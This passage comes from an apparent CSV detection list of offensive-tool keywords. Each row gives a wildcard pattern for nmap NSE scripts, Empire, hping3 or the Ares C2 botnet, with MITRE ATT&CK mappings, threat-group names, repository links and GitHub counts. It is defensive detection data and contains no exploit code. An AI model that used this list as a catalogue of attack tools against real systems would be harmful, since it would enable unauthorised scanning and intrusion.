tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* hostmap-robtex.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -Hosts * -TopPorts *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Portscan.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* hping3 *","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1297","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" +"* http://localhost:8080 -o agent*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"* http_malleable*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"* http-adobe-coldfusion-apsa1301.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-affiliate-id.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-apache-negotiation.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-apache-server-status.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-aspnet-debug.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-auth.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-auth-finder.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-avaya-ipoffice-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-awstatstotals-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-axis2-dir-traversal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-backup-finder.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-barracuda-dir-traversal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-bigip-cookie.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-cakephp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-chrono.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-cisco-anyconnect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-coldfusion-subzero.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-comments-displayer.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-config-backup.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-cookie-flags.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-cors.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-cross-domain-policy.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-csrf.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-date.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-default-accounts.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-devframework.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-dlink-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-dombased-xss.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-domino-enum-passwords.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-drupal-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-drupal-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-errors.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-exif-spider.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-favicon.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-feed.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-fetch.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-fileupload-exploiter.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-form-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-form-fuzzer.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-frontpage-login.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-generator.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-git.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-gitweb-projects-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-google-malware.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-grep.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-headers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-hp-ilo-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-huawei-hg5xx-vuln.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-icloud-findmyiphone.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-icloud-sendmsg.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-iis-short-name-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-iis-webdav-vuln.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-internal-ip-disclosure.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-joomla-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-jsonp-detection.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-lexmark-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","0","N/A","N/A","7","620","64","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" +"* http-lfi.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation 